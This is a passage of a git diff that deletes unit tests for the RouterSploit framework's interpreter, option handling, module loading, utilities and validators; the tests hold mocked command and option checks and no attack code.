- ) - - def test_complete_unsetg_3(self): - """ - Testing presence of available options - """ - self.set_module() - self.rsf.send("setg target foo\r\n") - self.rsf.send("setg port bar\r\n") - self.rsf.send("unsetg \t\t") - self.assertPrompt( - 'port', 'target', '\r\n', - self.module_prompt('FTP Bruteforce'), - ) - - def test_complete_unsetg_4(self): - """ - Testing presence of available options - """ - self.set_module() - self.rsf.send("setg target foo\r\n") - self.rsf.send("unsetg t\t\t") - self.assertPrompt( - self.module_prompt('FTP Bruteforce'), "unsetg target" - ) - - def test_complete_show_raw(self): - self.set_module() - self.rsf.send("sh\t\t") - self.assertPrompt( - self.module_prompt('FTP Bruteforce'), 'show ', - ) - - def test_complete_show(self): - self.set_module() - self.rsf.send("show \t\t") - self.assertPrompt( - 'all', 'creds', 'devices', 'exploits', - r'info', 'options', 'scanners', '\r\n', - self.module_prompt('FTP Bruteforce') - ) - - def test_complete_show_info(self): - self.set_module() - self.rsf.send("show i\t\t") - self.assertPrompt( - self.module_prompt('FTP Bruteforce'), 'show info' - ) - - def test_complete_show_options(self): - self.set_module() - self.rsf.send("show o\t\t") - self.assertPrompt( - self.module_prompt('FTP Bruteforce'), 'show options' - ) - - -if __name__ == '__main__': - unittest.main() diff --git a/tests/test_exploits.py b/tests/test_exploits.py deleted file mode 100644 index b90b9535a..000000000 --- a/tests/test_exploits.py +++ /dev/null @@ -1,106 +0,0 @@ -import os -import unittest - -import mock - -from routersploit.exceptions import OptionValidationError -from routersploit.exploits import Exploit, GLOBAL_OPTS, Option -from tests.test_case import RoutersploitTestCase - - -def suffix(x): - return "{}_suffix".format(x) - - -def SUFFIX(x): - return "{}_SUFFIX".format(x) - - -class TestExploitFoo(Exploit): - doo = Option(default=1, description="description_one") - paa = Option(default=2, description="description_two") - - -class TestExploitBar(Exploit): - doo = Option(default=3, description="description_three") - paa = Option(default=4, description="description_four") - - -class TestExploitWithValidators(Exploit): - doo = Option(default="default_value", description="description_three", - validators=suffix) - paa = Option(default="default_value", description="description_three", - validators=(suffix, SUFFIX)) - - -class OptionTest(RoutersploitTestCase): - def setUp(self): - self.exploit_foo = TestExploitFoo() - self.exploit_bar = TestExploitBar() - self.exploit_with_validators = TestExploitWithValidators() - GLOBAL_OPTS.clear() - - def test_default_value(self): - """ Test if default value is properly set. """ - self.assertEqual(self.exploit_foo.doo, 1) - self.assertEqual(self.exploit_foo.paa, 2) - self.assertEqual(self.exploit_bar.doo, 3) - self.assertEqual(self.exploit_bar.paa, 4) - - def test_set_value(self): - """ Test if descriptors are properly set. """ - self.exploit_foo.doo = "doopaa" - self.exploit_foo.paa = "kajak" - - self.assertEqual(self.exploit_foo.doo, "doopaa") - self.assertEqual(self.exploit_foo.paa, "kajak") - self.assertEqual(self.exploit_bar.doo, 3) - self.assertEqual(self.exploit_bar.paa, 4) - - def test_if_validator_is_NOT_applied_on_default_value(self): - self.assertEqual(self.exploit_with_validators.doo, "default_value") - - def test_if_validator_is_applied_after_setting_value(self): - self.exploit_with_validators.doo = "new_value" - self.assertEqual(self.exploit_with_validators.doo, "new_value_suffix") - - def test_if_validator_is_applied_in_specific_order(self): - self.exploit_with_validators.paa = "new_value" - self.assertEqual(self.exploit_with_validators.paa, - "new_value_suffix_SUFFIX") - - def test_if_exploit_option_is_picked_up_before_global(self): - GLOBAL_OPTS['doo'] = 'global_doo' - self.exploit_bar.doo = 'value' - self.exploit_foo.doo = 'value' - self.assertEqual(self.exploit_bar.doo, 'value') - self.assertEqual(self.exploit_foo.doo, 'value') - - def test_if_global_options_is_picked_up_before_default(self): - GLOBAL_OPTS['doo'] = 'global_doo' - self.assertEqual(self.exploit_bar.doo, 'global_doo') - self.assertEqual(self.exploit_foo.doo, 'global_doo') - - def test_if_validators_are_applied_on_global_options(self): - GLOBAL_OPTS['doo'] = 'global_doo' - self.assertEqual(self.exploit_with_validators.doo, 'global_doo_suffix') - - def test_str_representation(self): - with mock.patch.object(TestExploitFoo, "__module__", - new_callable=mock.PropertyMock) as mock_module: - mock_module.return_value = "routersploit.modules.exploits.foo.bar" - self.assertEqual(str(TestExploitFoo()), - os.path.join('exploits', 'foo', 'bar')) - - def test_exploit_options_property(self): - self.assertEqual(self.exploit_bar.options, ['paa', 'target', 'doo']) - self.assertEqual(self.exploit_foo.options, ['paa', 'target', 'doo']) - - def test_validate_setup(self): - with self.assertRaises(OptionValidationError): - self.exploit_bar.target = "" - self.exploit_bar.validate_setup() - - -if __name__ == '__main__': - unittest.main() diff --git a/tests/test_interpreter.py b/tests/test_interpreter.py deleted file mode 100644 index bbd268d72..000000000 --- a/tests/test_interpreter.py +++ /dev/null @@ -1,773 +0,0 @@ -import os -import unittest - -import mock - -from routersploit.exploits import Exploit, Option, GLOBAL_OPTS -from routersploit.interpreter import RoutersploitInterpreter -from tests.test_case import RoutersploitTestCase - - -class TestExploitFoo(Exploit): - doo = Option(default=1, description="description_one") - paa = Option(default=2, description="description_two") - - -class RoutersploitInterpreterTest(RoutersploitTestCase): - def setUp(self): - RoutersploitInterpreter.setup = mock.Mock() - self.interpreter = RoutersploitInterpreter() - self.interpreter.current_module = mock.MagicMock() - self.raw_prompt_default = "\001\033[4m\002rsf\001\033[0m\002 > " - self.module_prompt_default = ( - lambda x: "\001\033[4m\002rsf\001\033[0m\002 " - "(\001\033[91m\002{}\001\033[0m\002) > ".format(x) - ) - GLOBAL_OPTS.clear() - - def prepare_prompt_env_variables(self, raw_prompt=None, - module_prompt=None): - if raw_prompt: - os.environ["RSF_RAW_PROMPT"] = raw_prompt - else: - try: - os.environ["RSF_RAW_PROMPT"] - except KeyError: - pass - - if module_prompt: - os.environ["RSF_MODULE_PROMPT"] = module_prompt - else: - try: - del os.environ["RSF_MODULE_PROMPT"] - except KeyError: - pass - - getattr(self.interpreter, '_{}__parse_prompt'.format( - self.interpreter.__class__.__name__))() - - @mock.patch('routersploit.utils.print_success') - def test_command_set(self, mock_print_success): - rhost, new_rhost_value = 'rhost_value', "new_rhost_value" - port, new_port_value = 'port_value', "new_port_value" - - self.interpreter.current_module.options = ['rhost', 'port'] - self.interpreter.current_module.rhost = rhost - self.interpreter.current_module.port = port - self.assertEqual(self.interpreter.current_module.rhost, rhost) - self.assertEqual(self.interpreter.current_module.port, port) - - self.interpreter.command_set('rhost {}'.format(new_rhost_value)) - self.interpreter.command_set('port {}'.format(new_port_value)) - - self.assertEqual(self.interpreter.current_module.rhost, - new_rhost_value) - self.assertEqual(self.interpreter.current_module.port, new_port_value) - - with self.assertRaises(KeyError): - self.assertNotEqual(GLOBAL_OPTS['rhost'], new_rhost_value) - self.assertNotEqual(GLOBAL_OPTS['port'], new_port_value) - - self.assertEqual( - mock_print_success.mock_calls, - [mock.call({'rhost': new_rhost_value}), - mock.call({'port': new_port_value})] - ) - - @mock.patch('routersploit.utils.print_error') - def test_command_set_unknown_option(self, mock_print_error): - unknown_option = "unknown" - del self.interpreter.current_module.unknown - known_options = ['known_option_1', 'known_option_2'] - self.interpreter.current_module.options = known_options - - self.interpreter.command_set( - '{} doesnt_matter_value'.format(unknown_option)) - - self.assertEqual( - mock_print_error.mock_calls, - [mock.call( - "You can't set option '{}'.\nAvailable options: {}".format( - unknown_option, known_options))] - ) - - @mock.patch('routersploit.utils.print_success') - def test_command_set_global(self, mock_print_success): - rhost, new_rhost_value = 'rhost_value', "new_rhost_value" - port, new_port_value = 'port_value', "new_port_value" - - self.interpreter.current_module.options = ['rhost', 'port'] - self.interpreter.current_module.rhost = rhost - self.interpreter.current_module.port = port - self.assertEqual(self.interpreter.current_module.rhost, rhost) - self.assertEqual(self.interpreter.current_module.port, port) - - self.interpreter.command_set('rhost {}'.format(new_rhost_value), - glob=True) - self.interpreter.command_set('port {}'.format(new_port_value), - glob=True) - - self.assertEqual(self.interpreter.current_module.rhost, - new_rhost_value) - self.assertEqual(self.interpreter.current_module.port, new_port_value) - self.assertEqual(GLOBAL_OPTS['rhost'], new_rhost_value) - self.assertEqual(GLOBAL_OPTS['port'], new_port_value) - self.assertEqual( - mock_print_success.mock_calls, - [mock.call({'rhost': new_rhost_value}), - mock.call({'port': new_port_value})] - ) - - @mock.patch('routersploit.utils.print_success') - def test_command_setg(self, mock_print_success): - target, new_target_value = 'target_value', "new_target_value" - self.interpreter.current_module.options = ['target', 'port'] - self.interpreter.current_module.target = target - - self.interpreter.command_setg('target {}'.format(new_target_value)) - - self.assertEqual(self.interpreter.current_module.target, - new_target_value) - self.interpreter.current_module = TestExploitFoo() - self.assertEqual(self.interpreter.current_module.target, - new_target_value) - mock_print_success.assert_called_once_with( - {'target': '{}'.format(new_target_value)}) - - @mock.patch('routersploit.utils.print_success') - def test_command_unsetg(self, mock_print_success): - GLOBAL_OPTS['foo'] = 'bar' - self.interpreter.command_unsetg('foo') - self.assertNotIn('foo', GLOBAL_OPTS.keys()) - mock_print_success.assert_called_once_with({'foo': ''}) - - @mock.patch('routersploit.utils.print_error') - def test_command_unsetg_unknown_option(self, mock_print_error): - unknown_option = "unknown" - GLOBAL_OPTS['foo'] = 'bar' - - self.interpreter.command_unsetg( - '{} doesnt_matter_value'.format(unknown_option)) - mock_print_error.assert_called_once_with( - "You can't unset global option '{}'.\n" - "Available global options: ['foo']".format(unknown_option)) - - @mock.patch('routersploit.utils.print_status') - def test_command_run(self, mock_print_status): - mock_run = mock.Mock() - mock_validate_setup = mock.Mock() - self.interpreter.current_module.run = mock_run - self.interpreter.current_module.validate_setup = mock_validate_setup - - self.interpreter.command_run() - mock_validate_setup.assert_called_once() - mock_run.assert_called_once_with() - mock_print_status.assert_called_once_with('Running module...') - - @mock.patch('routersploit.utils.print_success') - def test_command_check_target_vulnerable(self, mock_print_success): - mock_check = mock.Mock() - mock_validate_setup = mock.Mock() - self.interpreter.current_module.check = mock_check - self.interpreter.current_module.validate_setup = mock_validate_setup - mock_check.return_value = True - - self.interpreter.command_check() - mock_validate_setup.assert_called_once() - mock_check.assert_called_once_with() - mock_print_success.assert_called_once_with('Target is vulnerable') - - @mock.patch('routersploit.utils.print_error') - def test_command_check_target_not_vulnerable(self, print_error): - mock_check = mock.Mock() - mock_validate_setup = mock.Mock() - self.interpreter.current_module.check = mock_check - self.interpreter.current_module.validate_setup = mock_validate_setup - mock_check.return_value = False - - self.interpreter.command_check() - mock_validate_setup.assert_called_once() - mock_check.assert_called_once_with() - print_error.assert_called_once_with('Target is not vulnerable') - - @mock.patch('routersploit.utils.print_status') - def test_command_check_target_could_not_be_verified_1(self, print_status): - mock_check = mock.Mock() - mock_validate_setup = mock.Mock() - self.interpreter.current_module.check = mock_check - self.interpreter.current_module.validate_setup = mock_validate_setup - mock_check.return_value = "something" - - self.interpreter.command_check() - mock_validate_setup.assert_called_once() - mock_check.assert_called_once_with() - print_status.assert_called_once_with('Target could not be verified') - - @mock.patch('routersploit.utils.print_status') - def test_command_check_target_could_not_be_verified_2(self, print_status): - mock_check = mock.Mock() - mock_validate_setup = mock.Mock() - self.interpreter.current_module.check = mock_check - self.interpreter.current_module.validate_setup = mock_validate_setup - mock_check.return_value = None - - self.interpreter.command_check() - mock_validate_setup.assert_called_once() - mock_check.assert_called_once_with() - print_status.assert_called_once_with('Target could not be verified') - - @mock.patch('routersploit.utils.print_error') - def test_command_check_not_supported_by_module(self, print_error): - mock_check = mock.Mock() - mock_validate_setup = mock.Mock() - self.interpreter.current_module.check = mock_check - self.interpreter.current_module.validate_setup = mock_validate_setup - exception = NotImplementedError("Not available") - mock_check.side_effect = exception - - self.interpreter.command_check() - mock_check.assert_called_once_with() - print_error.assert_called_once_with(exception) - - @mock.patch('sys.exc_info') - @mock.patch('traceback.format_exc') - @mock.patch('routersploit.utils.print_error') - @mock.patch('routersploit.utils.print_status') - def test_command_run_exception_during_exploit_execution(self, - mock_print_status, - mock_print_error, - mock_format_exc, - mock_exc_info): - with mock.patch.object(self.interpreter.current_module, - 'run') as mock_run: - mock_run.side_effect = RuntimeError - mock_format_exc.return_value = stacktrace = "stacktrace" - mock_exc_info.return_value = info = "info" - - self.interpreter.command_run() - mock_run.assert_called_once_with() - mock_format_exc.assert_called_once_with(info) - mock_print_error.assert_called_once_with(stacktrace) - mock_print_status.assert_called_once_with('Running module...') - - def test_command_back(self): - self.assertIsNotNone(self.interpreter.current_module) - self.interpreter.command_back() - self.assertIsNone(self.interpreter.current_module) - - def test_custom_raw_prompt(self): - self.prepare_prompt_env_variables(raw_prompt="***{host}***") - self.interpreter.current_module = None - self.assertEqual("***rsf***", self.interpreter.prompt) - - def test_default_raw_prompt_no_env_variable(self): - self.prepare_prompt_env_variables() - self.interpreter.current_module = None - self.assertEqual(self.raw_prompt_default, self.interpreter.prompt) - - def test_default_raw_prompt_wrong_env_variable_format(self): - self.prepare_prompt_env_variables( - raw_prompt="wrong_format >") # no '{host}' substring - self.interpreter.current_module = None - self.assertEqual(self.raw_prompt_default, self.interpreter.prompt) - - def test_custom_module_prompt(self): - self.prepare_prompt_env_variables(module_prompt="*{host}*{module} >>>") - module_name = "module_name" - self.interpreter.current_module._MagicMock__info__ = { - 'name': module_name} - self.assertEqual("*rsf*{} >>>".format(module_name), - self.interpreter.prompt) - - def test_default_module_prompt_no_env_variable(self): - self.prepare_prompt_env_variables() - name = "current_module_name" - self.interpreter.current_module._MagicMock__info__ = {'name': name} - self.assertEqual(self.module_prompt_default(name), - self.interpreter.prompt) - - def test_default_module_prompt_wrong_env_variable_format_1(self): - self.prepare_prompt_env_variables( - raw_prompt="{module} >") # no '{host}' substring - name = "current_module_name" - self.interpreter.current_module._MagicMock__info__ = {'name': name} - self.assertEqual(self.module_prompt_default(name), - self.interpreter.prompt) - - def test_default_module_prompt_wrong_env_variable_format_2(self): - self.prepare_prompt_env_variables( - module_prompt="{host} >") # no '{module}' substring - name = "current_module_name" - self.interpreter.current_module._MagicMock__info__ = {'name': name} - self.assertEqual(self.module_prompt_default(name), - self.interpreter.prompt) - - def test_module_prompt_module_has_no_metadata(self): - del self.interpreter.current_module._MagicMock__info__ - self.assertEqual(self.module_prompt_default('UnnamedModule'), - self.interpreter.prompt) - - def test_module_prompt_module_has_no_name_key_in_metadata(self): - self.interpreter.current_module._MagicMock__info__ = {} - self.assertEqual(self.module_prompt_default('UnnamedModule'), - self.interpreter.prompt) - - def test_suggested_commands_with_loaded_module_and_no_global_value_set( - self): - self.assertEqual( - list(self.interpreter.suggested_commands()), - ['back', 'check', 'exec ', 'exit', 'help', 'run', 'search ', - 'set ', 'setg ', 'show ', 'use '] - # Extra space at the end because of following param - ) - - def test_suggested_commands_with_loaded_module_and_global_value_set(self): - GLOBAL_OPTS['key'] = 'value' - self.assertEqual( - list(self.interpreter.suggested_commands()), - ['back', 'check', 'exec ', 'exit', 'help', 'run', 'search ', - 'set ', 'setg ', 'show ', 'unsetg ', 'use '] - # Extra space at the end because of following param - ) - - def test_suggested_commands_without_loaded_module(self): - self.interpreter.current_module = None - self.assertEqual( - self.interpreter.suggested_commands(), - # Extra space at the end because of following param - ['exec ', 'exit', 'help', 'search ', 'show ', 'use '] - ) - - @mock.patch('importlib.import_module') - def test_command_use_01(self, mocked_import_module): - """ Testing command_use() - - * Known Exploit - * Known module - """ - module_path = "exploits/foo/bar" - self.interpreter.current_module = None - self.interpreter.modules = [module_path, 'doo/pa/foo/bar'] - exploit_class = mock.MagicMock(name="password_disclosure_module") - mocked_import_module.return_value = mocked_module = mock.MagicMock( - name='module') - mocked_module.Exploit = exploit_class - - self.interpreter.command_use(module_path) - - mocked_import_module.assert_called_once_with( - 'routersploit.modules.exploits.foo.bar') - self.assertEqual(self.interpreter.current_module, exploit_class()) - - @mock.patch('importlib.import_module') - def test_command_use_02(self, mocked_import_module): - """ Testing command_use() - - * Known Exploit - * Known module - """ - module_path = "creds/foo/bar/baz" - self.interpreter.current_module = None - self.interpreter.modules = [module_path, 'doo/pa/foo/bar'] - exploit_class = mock.MagicMock(name="password_disclosure_module") - mocked_import_module.return_value = mocked_module = mock.MagicMock( - name='module') - mocked_module.Exploit = exploit_class - - self.interpreter.command_use(module_path) - - mocked_import_module.assert_called_once_with( - 'routersploit.modules.creds.foo.bar.baz') - self.assertEqual(self.interpreter.current_module, exploit_class()) - - @mock.patch('importlib.import_module') - @mock.patch('routersploit.utils.print_error') - def test_command_use_unknown_module(self, mocked_print_error, - mocked_import_module): - """ Testing command_use() - - * Unknown module - """ - self.interpreter.current_module = None - self.interpreter.modules = ['doo/pa/foo/bar'] - module_path = "creds/foo/bar/baz" - mocked_import_module.side_effect = ImportError("Not working") - - self.interpreter.command_use(module_path) - - mocked_import_module.assert_called_once_with( - 'routersploit.modules.creds.foo.bar.baz') - - mocked_print_error.assert_called_once_with( - "Error during loading 'routersploit/modules/creds/foo/bar/baz'\n\n" - "Error: Not working\n\n" - "It should be valid path to the module. " - "Use key multiple times for completion." - ) - self.assertEqual(self.interpreter.current_module, None) - - @mock.patch('importlib.import_module') - @mock.patch('routersploit.utils.print_error') - def test_command_use_unknown_extension(self, mocked_print_error, - mocked_import_module): - """ Testing command_use() - - * Unknown Exploit - * Known module - """ - module_path = "exploits/foo/bar" - self.interpreter.current_module = None - self.interpreter.modules = [module_path, 'doo/pa/foo/bar'] - mocked_import_module.return_value = mocked_module = mock.MagicMock( - name='module') - del mocked_module.Exploit - - self.interpreter.command_use(module_path) - - mocked_import_module.assert_called_once_with( - 'routersploit.modules.exploits.foo.bar') - mocked_print_error.assert_called_once_with( - "Error during loading 'routersploit/modules/exploits/foo/bar'\n\n" - "Error: Exploit\n\n" - "It should be valid path to the module. " - "Use key multiple times for completion." - ) - - self.assertEqual(self.interpreter.current_module, None) - - @mock.patch('routersploit.utils.print_info') - def test_show_info(self, mock_print): - metadata = { - 'devices': 'target_desc', - 'authors': 'authors_desc', - 'references': 'references_desc', - 'description': 'description_desc', - 'name': 'name_desc' - } - description = "Elaborate description fo the module" - self.interpreter.current_module.__doc__ = description - self.interpreter.current_module._MagicMock__info__ = metadata - - self.interpreter._show_info() - self.assertEqual( - mock_print.mock_calls, - [ - mock.call('\nName:'), - mock.call('name_desc'), - mock.call('\nDescription:'), - mock.call('description_desc'), - mock.call('\nDevices:'), - mock.call('target_desc'), - mock.call('\nAuthors:'), - mock.call('authors_desc'), - mock.call('\nReferences:'), - mock.call('references_desc'), - mock.call() - ] - ) - - @mock.patch('routersploit.utils.print_info') - def test_command_show_info_module_with_no_metadata(self, mock_print): - metadata = {} - description = "Elaborate description fo the module" - self.interpreter.current_module.__doc__ = description - self.interpreter.current_module._MagicMock__info__ = metadata - - self.interpreter._show_info() - self.assertEqual( - mock_print.mock_calls, - [mock.call()] - ) - - @mock.patch('routersploit.utils.print_info') - def test_show_options(self, mock_print): - exploit_attributes = { - 'target': 'target_desc', - 'port': 'port_desc', - 'foo': 'foo_desc', - 'bar': 'bar_desc', - 'baz': 'baz_desc' - } - self.interpreter.current_module.options = ['target', 'port', 'foo', - 'bar', 'baz'] - self.interpreter.current_module.exploit_attributes\ - .__getitem__.side_effect = lambda key: exploit_attributes[key] - - self.interpreter.current_module.foo = 1 - self.interpreter.current_module.bar = 2 - self.interpreter.current_module.baz = 3 - self.interpreter.current_module.target = '127.0.0.1' - self.interpreter.current_module.port = 22 - - self.interpreter._show_options() - self.assertEqual( - mock_print.mock_calls, - [ - mock.call('\nTarget options:'), - mock.call(), - mock.call( - ' Name Current settings Description '), - mock.call( - ' ---- ---------------- ----------- '), - mock.call( - ' target 127.0.0.1 target_desc '), - mock.call( - ' port 22 port_desc '), - mock.call(), - mock.call('\nModule options:'), - mock.call(), - mock.call(' Name Current settings Description '), - mock.call(' ---- ---------------- ----------- '), - mock.call(' foo 1 foo_desc '), - mock.call(' bar 2 bar_desc '), - mock.call(' baz 3 baz_desc '), - mock.call(), - mock.call(), - ] - ) - - @mock.patch('routersploit.utils.print_info') - def test_command_show_options_when_there_is_no_module_opts(self, - mock_print): - exploit_attributes = { - 'target': 'target_desc', - 'port': 'port_desc', - } - self.interpreter.current_module.options = ['target', 'port'] - self.interpreter.current_module.exploit_attributes\ - .__getitem__.side_effect = lambda key: exploit_attributes[key] - - self.interpreter.current_module.target = '127.0.0.1' - self.interpreter.current_module.port = 22 - - self.interpreter._show_options() - self.assertEqual( - mock_print.mock_calls, - [ - mock.call('\nTarget options:'), - mock.call(), - mock.call( - ' Name Current settings Description '), - mock.call( - ' ---- ---------------- ----------- '), - mock.call( - ' target 127.0.0.1 target_desc '), - mock.call( - ' port 22 port_desc '), - mock.call(), - mock.call(), - ] - ) - - def test_command_show(self): - with mock.patch.object(self.interpreter, - "_show_options") as mock_show_options: - self.interpreter.command_show("options") - mock_show_options.assert_called_once_with("options") - - @mock.patch('routersploit.utils.print_error') - def test_command_show_unknown_sub_command(self, mock_print_error): - self.interpreter.command_show('unknown_sub_command') - mock_print_error.assert_called_once_with( - "Unknown 'show' sub-command 'unknown_sub_command'. " - "What do you want to show?\n" - "Possible choices are: {}".format( - self.interpreter.show_sub_commands)) - - @mock.patch('routersploit.utils.print_info') - def test_show_all(self, mock_print): - self.interpreter.modules = [ - 'exploits.foo', - 'exploits.bar', - 'scanners.foo', - 'scanners.bar', - 'creds.foo', - 'creds.bar', - ] - - self.interpreter._show_all() - self.assertEqual( - mock_print.mock_calls, - [ - mock.call('exploits/foo'), - mock.call('exploits/bar'), - mock.call('scanners/foo'), - mock.call("scanners/bar"), - mock.call("creds/foo"), - mock.call("creds/bar"), - ] - ) - - @mock.patch('routersploit.utils.print_info') - def test_show_scanners(self, mock_print): - self.interpreter.modules = [ - 'exploits.foo', - 'exploits.bar', - 'scanners.foo', - 'scanners.bar', - 'creds.foo', - 'creds.bar', - ] - - self.interpreter._show_scanners() - self.assertEqual( - mock_print.mock_calls, - [mock.call("scanners/foo"), mock.call("scanners/bar")] - ) - - @mock.patch('routersploit.utils.print_info') - def test_show_exploits(self, mock_print): - self.interpreter.modules = [ - 'exploits.foo', - 'exploits.bar', - 'scanners.foo', - 'scanners.bar', - 'creds.foo', - 'creds.bar', - ] - - self.interpreter._show_exploits() - self.assertEqual( - mock_print.mock_calls, - [mock.call("exploits/foo"), mock.call("exploits/bar")] - ) - - @mock.patch('routersploit.utils.print_info') - def test_show_creds(self, mock_print): - self.interpreter.modules = [ - 'exploits.foo', - 'exploits.bar', - 'scanners.foo', - 'scanners.bar', - 'creds.foo', - 'creds.bar', - ] - - self.interpreter._show_creds() - self.assertEqual( - mock_print.mock_calls, - [mock.call("creds/foo"), mock.call("creds/bar")] - ) - - def test_if_command_run_has_module_required_decorator(self): - self.assertIsDecorated( - self.interpreter.command_run, - "module_required" - ) - - def test_if_command_set_has_module_required_decorator(self): - self.assertIsDecorated( - self.interpreter.command_set, - "module_required" - ) - - def test_if_command_show_info_has_module_required_decorator(self): - self.assertIsDecorated( - self.interpreter._show_info, - "module_required" - ) - - def test_if_command_show_options_has_module_required_decorator(self): - self.assertIsDecorated( - self.interpreter._show_options, - "module_required" - ) - - def test_if_command_show_devices_has_module_required_decorator(self): - self.assertIsDecorated( - self.interpreter._show_devices, - "module_required" - ) - - def test_if_command_check_has_module_required_decorator(self): - self.assertIsDecorated( - self.interpreter.command_check, - "module_required" - ) - - def test_command_exit(self): - with self.assertRaises(EOFError): - self.interpreter.command_exit() - - def test_parse_line(self): - cmd, args = self.interpreter.parse_line("show options") - self.assertEqual(cmd, "show") - self.assertEqual(args, "options") - - @mock.patch('os.system') - def test_command_exec(self, mock_system): - self.interpreter.command_exec("foo -bar") - mock_system.assert_called_once_with("foo -bar") - - @mock.patch('routersploit.utils.print_info') - def test_command_help(self, mock_print): - self.interpreter.current_module = None - self.interpreter.command_help() - mock_print.assert_called_once_with(self.interpreter.global_help) - - @mock.patch('routersploit.utils.print_info') - def test_command_help_with_module_loaded(self, mock_print): - self.interpreter.command_help() - - self.assertEqual( - mock_print.mock_calls, - [ - mock.call(self.interpreter.global_help), - mock.call("\n", self.interpreter.module_help), - ] - ) - - @mock.patch('routersploit.utils.print_info') - def test_command_search_01(self, mock_print): - self.interpreter.modules = [ - 'exploits.asus.foo', - 'exploits.asus.bar', - 'exploits.linksys.baz', - 'exploits.cisco.foo', - ] - self.interpreter.command_search("asus") - self.assertEqual( - mock_print.mock_calls, - [ - mock.call('exploits/\x1b[31masus\x1b[0m/foo'), - mock.call('exploits/\x1b[31masus\x1b[0m/bar'), - ] - ) - - @mock.patch('routersploit.utils.print_info') - def test_command_search_02(self, mock_print): - self.interpreter.modules = [ - 'exploits.asus.foo', - 'exploits.asus.bar', - 'exploits.linksys.baz', - 'exploits.cisco.foo', - ] - self.interpreter.command_search("foo") - self.assertEqual( - mock_print.mock_calls, - [ - mock.call('exploits/asus/\x1b[31mfoo\x1b[0m'), - mock.call('exploits/cisco/\x1b[31mfoo\x1b[0m') - ] - ) - - @mock.patch('routersploit.utils.print_error') - def test_command_search_03(self, print_error): - self.interpreter.modules = [ - 'exploits.asus.foo', - 'exploits.asus.bar', - 'exploits.linksys.baz', - 'exploits.cisco.foo', - ] - self.interpreter.command_search("") - self.assertEqual( - print_error.mock_calls, - [ - mock.call( - "Please specify search keyword. e.g. 'search cisco'"), - ] - ) - - -if __name__ == '__main__': - unittest.main() diff --git a/tests/test_modules.py b/tests/test_modules.py deleted file mode 100644 index fd8423421..000000000 --- a/tests/test_modules.py +++ /dev/null @@ -1,54 +0,0 @@ -import unittest - -from routersploit.utils import iter_modules -from tests.test_case import RoutersploitTestCase - - -class ModuleTest(RoutersploitTestCase): - """A test case that every module must pass. - - Attributes: - module (Exploit): The exploit instance of the module being tested. - metadata (Dict): The info associated with the module. - """ - - def __init__(self, methodName='runTest', module=None): - super(ModuleTest, self).__init__(methodName) - self.module = module - - def __str__(self): - return " ".join( - [super(ModuleTest, self).__str__(), self.module.__module__]) - - @property - def module_metadata(self): - return getattr(self.module, "_{}__info__".format(self.module.__name__)) - - def test_required_metadata(self): - required_metadata = ( - "name", - "description", - "devices", - "authors", - "references" - ) - self.assertIsSubset(required_metadata, self.module_metadata.keys()) - - def test_metadata_type(self): - self.assertIsSequence(self.module_metadata['authors']) - self.assertIsSequence(self.module_metadata['references']) - self.assertIsSequence(self.module_metadata['devices']) - - -def load_tests(loader, tests, pattern): - """ Map every module to a test case, and group them into a suite. """ - - suite = unittest.TestSuite() - test_names = loader.getTestCaseNames(ModuleTest) - for module in iter_modules(): - suite.addTests([ModuleTest(name, module) for name in test_names]) - return suite - - -if __name__ == '__main__': - unittest.main() diff --git a/tests/test_utils.py b/tests/test_utils.py deleted file mode 100644 index 6d68dcbf6..000000000 --- a/tests/test_utils.py +++ /dev/null @@ -1,100 +0,0 @@ -import unittest - -import mock - -from routersploit import utils -from tests.test_case import RoutersploitTestCase - - -class UtilsTest(RoutersploitTestCase): - @mock.patch('os.walk') - def test_load_modules_01(self, mock_walk): - mock_walk.return_value = ( - ('/Abs/Path/routersploit/routersploit/modules', ['asmax', 'creds'], - ['__init__.py', '__init__.pyc']), - ('/Abs/Path/routersploit/routersploit/modules/creds', [], - ['__init__.py', '__init__.pyc', 'ftp_bruteforce.py', - 'ftp_bruteforce.pyc']), - ('/Abs/Path/routersploit/routersploit/modules/exploits/asmax', [], - ['__init__.py', '__init__.pyc', 'asmax_exploit.py', - 'asmax_exploit.pyc']), - ) - - path = 'path/to/module' - modules = utils.index_modules(path) - - mock_walk.assert_called_once_with(path) - self.assertEqual( - modules, - [ - 'creds.ftp_bruteforce', - 'exploits.asmax.asmax_exploit' - ] - ) - - @mock.patch('os.walk') - def test_load_modules_import_error_02(self, mock_walk): - mock_walk.return_value = ( - ('/Abs/Path/routersploit/routersploit/modules', ['asmax', 'creds'], - ['__init__.py', '__init__.pyc']), - ('/Abs/Path/routersploit/routersploit/modules/creds', [], - ['__init__.py', '__init__.pyc', 'ftp_bruteforce.py', - 'ftp_bruteforce.pyc']), - ('/Abs/Path/routersploit/routersploit/modules/exploits/asmax', [], - ['__init__.py', '__init__.pyc', 'asmax_exploit.py', - 'asmax_exploit.pyc', 'asmax_multi.py', 'asmax_multi.pyc']), - ) - - path = 'path/to/module' - modules = utils.index_modules(path) - - mock_walk.assert_called_once_with(path) - - self.assertEqual( - modules, - [ - 'creds.ftp_bruteforce', - 'exploits.asmax.asmax_exploit', - 'exploits.asmax.asmax_multi', - ] - ) - - @mock.patch('routersploit.utils.print_info') - def test_print_table_01(self, mock_print): - utils.print_table( - ["Name", "Value", "Description"], - ('foo', 'bar', 'baz'), - (1, 2, 3), - ("port", 80, "port number") - ) - self.assertEqual( - mock_print.mock_calls, - [ - mock.call(), - mock.call(' Name Value Description '), - mock.call(' ---- ----- ----------- '), - mock.call(' foo bar baz '), - mock.call(' 1 2 3 '), - mock.call(' port 80 port number '), - mock.call() - ] - ) - - @mock.patch('routersploit.utils.print_info') - def test_print_table_02(self, mock_print): - utils.print_table( - ["Name", "Value", "Description"], - ) - self.assertEqual( - mock_print.mock_calls, - [ - mock.call(), - mock.call(' Name Value Description '), - mock.call(' ---- ----- ----------- '), - mock.call() - ] - ) - - -if __name__ == '__main__': - unittest.main() diff --git a/tests/test_validators.py b/tests/test_validators.py deleted file mode 100644 index baa817e15..000000000 --- a/tests/test_validators.py +++ /dev/null @@ -1,170 +0,0 @@ -import unittest - -import mock - -from routersploit import validators -from routersploit.exceptions import OptionValidationError -from tests.test_case import RoutersploitTestCase - - -class ValidatorsTest(RoutersploitTestCase): - def test_url_adding_http_prefix(self): - self.assertEqual(validators.url("127.0.0.1"), "http://127.0.0.1") - - def test_url_already_with_http_prefix(self): - self.assertEqual(validators.url("http://127.0.0.1"), - "http://127.0.0.1") - - def test_url_already_with_https_prefix(self): - self.assertEqual(validators.url("https://127.0.0.1"), - "https://127.0.0.1") - - def test_ipv4_valid_address(self): - address = "127.0.0.1" - 